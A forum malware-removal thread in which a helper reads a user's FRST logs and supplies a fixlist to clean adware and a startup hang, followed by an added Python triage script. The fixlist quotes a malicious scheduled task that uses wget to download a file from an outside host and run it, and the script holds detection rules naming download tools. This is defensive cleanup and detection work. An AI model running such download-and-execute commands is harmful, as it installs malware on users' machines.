The .runonce installer component hangs system startup


(Olislask) #1

Hello, I have a problem with the installer component I named in the title, following one failed installation of a program. Please help. I am pasting the logs:

 

http://wklejto.pl/221511

http://www.wklejto.pl/221512


(Acorus) #2

Download Farbar Recovery Scan Tool http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/ matching your system version, 32-bit or 64-bit.

Run FRST and click Scan. Show the FRST and Addition reports.


(Olislask) #3

http://wklejto.pl/221514

http://www.wklejto.pl/221515


(Acorus) #4

Open the system Notepad and paste:

Task: {0E2B92B8-0CA2-4309-B5A4-CFE45D3F9B09} - System32\Tasks\{AACA0DB6-B87A-4080-86B1-5EE20BBE2206} = Firefox.exe http://ui.skype.com/ui/0/5.1.0.112/en/abandoninstall?page=tsMain&installinfo=google-toolbar:notoffered;ienotdefaultbrowser2,google-chrome:notoffered;systemlevelpresent
Task: {295AB9B5-1239-45C9-A399-112A73D20F42} - System32\Tasks\{20B4667E-A1D7-43F3-A25D-1D34746D6473} = Firefox.exe http://ui.skype.com/ui/0/5.3.0.120/en/abandoninstall?page=tsMain&installinfo=google-toolbar:notoffered;ienotdefaultbrowser2,google-chrome:notoffered;systemlevelpresent
Task: {34FD4368-3696-4FF0-9D85-2260F40CD4AD} - System32\Tasks\{898C9483-0D1E-449E-8C7E-284CD08758D5} = Firefox.exe http://ui.skype.com/ui/0/5.5.0.124/en/abandoninstall?page=tsPlugin&installinfo=google-toolbar:notoffered;notincluded,google-chrome:notoffered;disabled
Task: {CE5274F1-EE3B-4DD2-8B68-D5F7AC49DE8F} - System32\Tasks\SYSTEM = cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grigle.in/index.php?data=FnW8p883Ap;Nero_7.10.1.0.exe;1422648940 & start cmd /R dat.bmp ==== ATTENTION
Task: {D59460F8-80C2-4671-BFEB-E45CB6E4C673} - System32\Tasks\WSE_Vosteran = C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\UpdateTask.exe [2015-01-29] () ==== ATTENTION
Task: C:\Windows\Tasks\WSE_Vosteran.job = C:\Users\xyz\AppData\Roaming\WSE_VO~1\UPDATE~1\UPDATE~1.EXE ==== ATTENTION
HKLM\...\Run: [RtHDVCpl] = C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [6724128 2009-02-11] (Realtek Semiconductor)
HKLM\...\Run: [SunJavaUpdateSched] = C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
HKLM\...\Run: [NBKeyScan] = "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
HKLM\...\RunOnce: [WSE_Vosteran] = C:\Windows\system32\wscript.exe /E:vbscript /B "C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\bkup.dat"
HKU\S-1-5-21-1628744980-273724389-3362731733-1000\...\RunOnce: [WSE_Vosteran] = C:\Windows\system32\wscript.exe /E:vbscript /B "C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\bkup.dat"
AppInit_DLLs: C:/PROGRA~2/{9BF87~1/171~1.0/sodo.dll = C:/PROGRA~2/{9BF87~1/171~1.0/sodo.dll [649216 2015-01-29] ()
GroupPolicy: Group Policy on Chrome detected ======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction ======= ATTENTION
HKU\S-1-5-21-1628744980-273724389-3362731733-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://rts.dsrlte.com?affID=na
SearchScopes: HKLM - DefaultScope value is missing.
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://vosteran.com/results.php?f=4q={searchTerms}a=vst_aw_15_05_ffcd=2XzuyEtN2Y1L1QzutDtDtBtAyD0A0EyCtD0EyDzyyD0F0A0FtN0D0Tzu0StCtCtByEtN1L2XzutAtFyBtFtBtFtCtN1L1Czu0C0I0S0V0E0R1V1BtAtN1L1G1B1V1N2Y1L1Qzu2StA0C0E0FyC0C0EtAtGyE0F0D0CtGyBzzyDyDtGyE0DtCtCtGyDtB0DtAyD0B0BzzzzyCyBtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0A0D0ByCyDtD0DtGtA0BtB0BtGyE0FtB0FtGzz0DyE0BtG0FyDyEtDtDyD0F0CtCtDtCtD2QtN1B1L1H1Ezu1O2U1M1Bcr=692820243ir=
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://vosteran.com/results.php?f=4q={searchTerms}a=vst_aw_15_05_ffcd=2XzuyEtN2Y1L1QzutDtDtBtAyD0A0EyCtD0EyDzyyD0F0A0FtN0D0Tzu0StCtCtByEtN1L2XzutAtFyBtFtBtFtCtN1L1Czu0C0I0S0V0E0R1V1BtAtN1L1G1B1V1N2Y1L1Qzu2StA0C0E0FyC0C0EtAtGyE0F0D0CtGyBzzyDyDtGyE0DtCtCtGyDtB0DtAyD0B0BzzzzyCyBtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0A0D0ByCyDtD0DtGtA0BtB0BtGyE0FtB0FtGzz0DyE0BtG0FyDyEtDtDyD0F0CtCtDtCtD2QtN1B1L1H1Ezu1O2U1M1Bcr=692820243ir=
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://vosteran.com/results.php?f=4q={searchTerms}a=vst_aw_15_05_ffcd=2XzuyEtN2Y1L1QzutDtDtBtAyD0A0EyCtD0EyDzyyD0F0A0FtN0D0Tzu0StCtCtByEtN1L2XzutAtFyBtFtBtFtCtN1L1Czu0C0I0S0V0E0R1V1BtAtN1L1G1B1V1N2Y1L1Qzu2StA0C0E0FyC0C0EtAtGyE0F0D0CtGyBzzyDyDtGyE0DtCtCtGyDtB0DtAyD0B0BzzzzyCyBtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0A0D0ByCyDtD0DtGtA0BtB0BtGyE0FtB0FtGzz0DyE0BtG0FyDyEtDtDyD0F0CtCtDtCtD2QtN1B1L1H1Ezu1O2U1M1Bcr=692820243ir=
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKU\S-1-5-21-1628744980-273724389-3362731733-1000 - {E89D0C89-2ECD-4514-ABC1-887BC9EFF2CC} URL = http://rts.dsrlte.com/?affID=naq={searchTerms}r=927
FF DefaultSearchEngine: Vosteran
FF SelectedSearchEngine: Yahoo! Search
FF Homepage: hxxp://rts.dsrlte.com?affID=na
FF SearchPlugin: C:\Users\xyz\AppData\Roaming\Mozilla\Firefox\Profiles\t20vo22e.default\searchplugins\dsrlte.xml
FF SearchPlugin: C:\Users\xyz\AppData\Roaming\Mozilla\Firefox\Profiles\t20vo22e.default\searchplugins\Vosteran.xml
CHR RestoreOnStartup: Default - "hxxp://search.yahoo.com/?fr=hp-ddc-bdtype=616_pr __alt__ ddc_dsssyc_bd_com"
CHR StartupUrls: Default - "hxxp://search.yahoo.com/?fr=hp-ddc-bdtype=616_pr __alt__ ddc_dsssyc_bd_com"
CHR DefaultNewTabURL: Default - http://search.yahoo.com/?fr=hp-ddc-bd-tabtype=616_pr __alt__ ddc_dsssyctab_bd_com
CHR HKLM\...\Chrome\Extension: [oilkkkefbalmbfppgjmgjoefbclebkce] - No Path
CHR HKU\S-1-5-21-1628744980-273724389-3362731733-1000\...\Chrome\Extension: [oilkkkefbalmbfppgjmgjoefbclebkce] - No Path
S2 Nero BackItUp Scheduler 4.0; C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe [X]
S3 WPFFontCache_v0400; C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe [X]
R1 {371bcf01-e691-44bf-9345-60788e5d16a5}t; C:\Windows\System32\drivers\{371bcf01-e691-44bf-9345-60788e5d16a5}t.sys [55832 2015-01-29] (StdLib)
2015-01-29 23:03 - 2015-01-29 23:03 - 00000000 ____ D () C:\Users\xyz\AppData\Local\Pay-By-Ads
2015-01-29 23:03 - 2015-01-29 10:33 - 00055832 _____ (StdLib) C:\Windows\system32\Drivers\{371bcf01-e691-44bf-9345-60788e5d16a5}t.sys
2015-01-29 22:54 - 2015-01-31 18:54 - 00000284 _____ () C:\Windows\Tasks\WSE_Vosteran.job
2015-01-29 22:54 - 2015-01-29 22:54 - 00000000 ____ D () C:\Users\xyz\AppData\Roaming\WSE_Vosteran
2015-01-29 22:54 - 2015-01-29 22:54 - 00000000 ____ D () C:\ProgramData\{9BF8733B-CB7A-A2BD-7AFC-D23FAA7E01B1}
2015-01-29 22:54 - 2015-01-29 22:54 - 00000000 ____ D () C:\Program Files\WSE_Vosteran
2015-01-29 22:53 - 2015-01-29 23:29 - 00000000 ____ D () C:\Program Files\Solution Real
2013-01-04 13:04 - 2014-05-21 17:49 - 0001330 _____ () C:\Users\xyz\AppData\Roaming\wklnhst.dat
C:\ProgramData\wget.exe
EmptyTemp:

Save the file as fixlist.txt and place it next to FRST in the same folder.
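Added example, not part of the thread and not FRST's own code: a small triage pass over autostart lines of the shape listed in the fixlist above (scheduled tasks, Run/RunOnce values, AppInit_DLLs), flagging the patterns those entries share. The names `ENTRY`, `RULES` and `triage`, the rule wording, and the placeholder URL in the sample are assumptions made for this illustration.

```python
import re

# Constructed sample: four lines abridged from the fixlist in this thread,
# with a placeholder URL in place of the original download address.
SAMPLE = r'''
Task: {CE5274F1-EE3B-4DD2-8B68-D5F7AC49DE8F} - System32\Tasks\SYSTEM = cmd.exe /R cd "C:\ProgramData" & wget -O dat.bmp http://example.invalid/x & start cmd /R dat.bmp
HKLM\...\Run: [RtHDVCpl] = C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [6724128 2009-02-11] (Realtek Semiconductor)
HKLM\...\RunOnce: [WSE_Vosteran] = C:\Windows\system32\wscript.exe /E:vbscript /B "C:\Users\xyz\AppData\Roaming\WSE_Vosteran\UpdateProc\bkup.dat"
AppInit_DLLs: C:/PROGRA~2/{9BF87~1/171~1.0/sodo.dll = C:/PROGRA~2/{9BF87~1/171~1.0/sodo.dll [649216 2015-01-29] ()
'''

# "<kind>: <name> = <command>" for the autostart line shapes seen in the thread.
ENTRY = re.compile(
    r'^(?P<kind>Task|AppInit_DLLs|\S*\\(?:Run|RunOnce)):\s*(?P<name>.*?) = (?P<cmd>.*)$')

# Heuristics (assumptions for this example): each returns a truthy value
# when the entry deserves a closer look.
RULES = [
    ("script host runs a file from a user profile",
     lambda kind, cmd: re.search(r'\b[wc]script\.exe\b', cmd, re.I)
     and re.search(r'\\AppData\\', cmd, re.I)),
    ("cmd.exe invoking a download tool",
     lambda kind, cmd: re.search(r'\bcmd(\.exe)?\b', cmd, re.I)
     and re.search(r'\b(wget|curl|bitsadmin)\b', cmd, re.I)),
    ("DLL loaded through AppInit_DLLs",
     lambda kind, cmd: kind == "AppInit_DLLs" and cmd.strip() != ""),
]

def triage(report):
    """Return (kind, name, reason) for every autostart line matching a rule."""
    findings = []
    for line in report.splitlines():
        m = ENTRY.match(line.strip())
        if not m:
            continue
        kind = m["kind"].rsplit("\\", 1)[-1]  # HKLM\...\RunOnce -> RunOnce
        for reason, test in RULES:
            if test(kind, m["cmd"]):
                findings.append((kind, m["name"], reason))
    return findings

if __name__ == "__main__":
    for kind, name, reason in triage(SAMPLE):
        print(f"{kind:13} {name}: {reason}")
```

The Realtek `Run` entry passes through unflagged; a hit is only a prompt to inspect the entry, not a verdict on it.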


(Olislask) #5

Cleaned, the difference is visible right away. Thank you!


(Acorus) #6

Delete the folder C:\FRST